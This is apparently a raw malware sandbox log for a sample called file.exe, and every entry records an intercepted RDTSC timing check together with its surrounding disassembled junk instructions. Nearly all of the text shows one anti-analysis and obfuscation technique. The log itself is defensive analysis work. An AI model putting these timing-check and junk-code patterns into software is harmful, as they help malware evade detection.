          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5F97 second address: 9F5F9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F992B second address: 9F9936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FAF74D778D6h 0x0000000a pop edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F9936 second address: 9F995C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007FAF74D8F595h 0x0000000a pop edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jg 00007FAF74D8F586h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A03BD8 second address: A03BF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D778E6h 0x00000007 jng 00007FAF74D778DCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05B31 second address: A05B69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FAF74D8F58Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FAF74D8F58Fh 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 jmp 00007FAF74D8F591h 0x0000001b popad 0x0000001c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05B69 second address: A05B6E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A08097 second address: A080BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FAF74D8F597h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007FAF74D8F59Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A080BC second address: A080E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF74D778DEh 0x00000009 pop edx 0x0000000a pushad 0x0000000b jmp 00007FAF74D778E0h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10178 second address: A10182 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAF74D8F586h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10182 second address: A10188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11BBA second address: A11BD5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAF74D8F586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jbe 00007FAF74D8F586h 0x00000011 jl 00007FAF74D8F586h 0x00000017 push edi 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11BD5 second address: A11BF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FAF74D778E9h 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11A47 second address: A11A50 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1ECC2 second address: A1ECC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A37CCC second address: A37CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A37CD2 second address: A37CD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A375B8 second address: A375BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A375BE second address: A375C4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A378AE second address: A378B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A378B4 second address: A378BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A378BE second address: A378E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FAF74D8F597h 0x0000000a pop eax 0x0000000b pushad 0x0000000c je 00007FAF74D8F586h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A95F second address: A3A963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A963 second address: A3A969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A969 second address: A3A96F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A96F second address: A3A973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A973 second address: A3A977 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D997 second address: A3D99C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D99C second address: A3D9A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D9A2 second address: A3D9A8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532033D second address: 5320354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FAF74D778E1h 0x00000009 pop ecx 0x0000000a popad 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5320354 second address: 532035A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532035A second address: 532035E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532035E second address: 5320394 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FAF74D8F594h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 call 00007FAF74D8F593h 0x00000017 pop ecx 0x00000018 popad 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5320394 second address: 53203A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ax, bx 0x0000000f popad 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53203A4 second address: 53203CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D8F590h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push ecx 0x0000000d mov esi, edx 0x0000000f pop edi 0x00000010 mov ebx, esi 0x00000012 popad 0x00000013 mov edx, dword ptr [ebp+0Ch] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b mov bx, 5E4Eh 0x0000001f popad 0x00000020 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5320405 second address: 5320409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5320409 second address: 532040F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532040F second address: 5320415 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350399 second address: 535039F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535039F second address: 53503A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53503A3 second address: 53503F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D8F58Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FAF74D8F594h 0x00000013 add al, FFFFFFC8h 0x00000016 jmp 00007FAF74D8F58Bh 0x0000001b popfd 0x0000001c mov di, cx 0x0000001f popad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 call 00007FAF74D8F58Eh 0x00000029 pop esi 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53503F7 second address: 53503FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53503FC second address: 5350437 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, al 0x00000005 mov eax, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c call 00007FAF74D8F591h 0x00000011 mov cx, 0007h 0x00000015 pop eax 0x00000016 mov esi, edi 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FAF74D8F592h 0x00000022 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350437 second address: 5350473 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FAF74D778E4h 0x00000012 or ah, 00000048h 0x00000015 jmp 00007FAF74D778DBh 0x0000001a popfd 0x0000001b mov dh, ah 0x0000001d popad 0x0000001e mov dword ptr [esp], ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350473 second address: 5350477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350477 second address: 535047B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535047B second address: 5350481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350481 second address: 53504B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FAF74D778E5h 0x00000008 pop ecx 0x00000009 mov cx, bx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebp 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 call 00007FAF74D778E4h 0x00000018 pop ecx 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53504B9 second address: 535051B instructions: 0x00000000 rdtsc 0x00000002 mov bx, 8276h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007FAF74D8F58Dh 0x0000000f and ecx, 19357526h 0x00000015 jmp 00007FAF74D8F591h 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007FAF74D8F590h 0x00000021 xor eax, 136ED6C8h 0x00000027 jmp 00007FAF74D8F58Bh 0x0000002c popfd 0x0000002d popad 0x0000002e popad 0x0000002f mov dword ptr [esp], esi 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 mov bx, 9536h 0x00000039 movsx edi, cx 0x0000003c popad 0x0000003d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535051B second address: 5350521 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350521 second address: 5350525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350525 second address: 5350535 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350535 second address: 535053D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, si 0x00000007 popad 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535053D second address: 5350543 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350543 second address: 5350547 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350547 second address: 5350564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAF74D778E0h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350564 second address: 535056A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535056A second address: 535057B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF74D778DDh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535057B second address: 535059C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007FAF74D8F58Dh 0x00000010 push dword ptr [ebp+08h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535059C second address: 53505A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53505A2 second address: 53505B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF74D8F591h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534005B second address: 53400AE instructions: 0x00000000 rdtsc 0x00000002 mov cx, F021h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push FFFFFFFEh 0x0000000b pushad 0x0000000c mov bl, ch 0x0000000e mov eax, edi 0x00000010 popad 0x00000011 push 73A0D490h 0x00000016 pushad 0x00000017 mov ecx, 205CFB93h 0x0000001c call 00007FAF74D778E8h 0x00000021 mov ah, BEh 0x00000023 pop ebx 0x00000024 popad 0x00000025 add dword ptr [esp], 0209C9B8h 0x0000002c jmp 00007FAF74D778DAh 0x00000031 push 366B8185h 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 push edi 0x0000003a pop esi 0x0000003b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53400AE second address: 5340103 instructions: 0x00000000 rdtsc 0x00000002 call 00007FAF74D8F599h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushfd 0x0000000d jmp 00007FAF74D8F597h 0x00000012 or al, FFFFFFEEh 0x00000015 jmp 00007FAF74D8F599h 0x0000001a popfd 0x0000001b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340103 second address: 5340117 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 3F39A9EBh 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 mov di, si 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340117 second address: 5340152 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ecx, edi 0x00000009 popad 0x0000000a mov eax, dword ptr fs:[00000000h] 0x00000010 jmp 00007FAF74D8F593h 0x00000015 nop 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FAF74D8F595h 0x0000001d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340152 second address: 5340162 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF74D778DCh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340162 second address: 53401BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FAF74D8F58Ch 0x00000010 add cx, 5258h 0x00000015 jmp 00007FAF74D8F58Bh 0x0000001a popfd 0x0000001b jmp 00007FAF74D8F598h 0x00000020 popad 0x00000021 nop 0x00000022 jmp 00007FAF74D8F590h 0x00000027 sub esp, 18h 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53401BD second address: 53401C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53401C1 second address: 53401DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D8F599h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53401DE second address: 534023D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAF74D778E7h 0x00000009 sbb eax, 6F85508Eh 0x0000000f jmp 00007FAF74D778E9h 0x00000014 popfd 0x00000015 mov esi, 3BC9F797h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebx 0x0000001e jmp 00007FAF74D778DAh 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FAF74D778DEh 0x0000002b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534023D second address: 534024F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF74D8F58Eh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534024F second address: 5340253 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340253 second address: 5340262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340262 second address: 5340266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340266 second address: 534027E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D8F594h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534027E second address: 534029E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D778DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b mov dx, ax 0x0000000e push eax 0x0000000f mov ecx, ebx 0x00000011 pop edx 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534029E second address: 53402A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53402A2 second address: 53402A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53402A8 second address: 53402DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 mov ch, dl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b pushad 0x0000000c call 00007FAF74D8F58Ch 0x00000011 push ecx 0x00000012 pop edx 0x00000013 pop ecx 0x00000014 mov ecx, edx 0x00000016 popad 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FAF74D8F595h 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53402DE second address: 53402E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53402E4 second address: 53402E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53402E8 second address: 53402EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53402EC second address: 53402FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53402FF second address: 5340319 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF74D778E6h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340319 second address: 534031D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534031D second address: 5340336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [75AB4538h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FAF74D778DAh 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340336 second address: 534033C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534033C second address: 5340340 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340340 second address: 53403B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [ebp-08h], eax 0x0000000b pushad 0x0000000c mov dl, 06h 0x0000000e movzx ecx, bx 0x00000011 popad 0x00000012 xor eax, ebp 0x00000014 jmp 00007FAF74D8F598h 0x00000019 nop 0x0000001a jmp 00007FAF74D8F590h 0x0000001f push eax 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 pushfd 0x00000024 jmp 00007FAF74D8F597h 0x00000029 xor eax, 4A7D23AEh 0x0000002f jmp 00007FAF74D8F599h 0x00000034 popfd 0x00000035 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53403B9 second address: 53403E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D778E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b call 00007FAF74D778E0h 0x00000010 pop eax 0x00000011 rdtsc
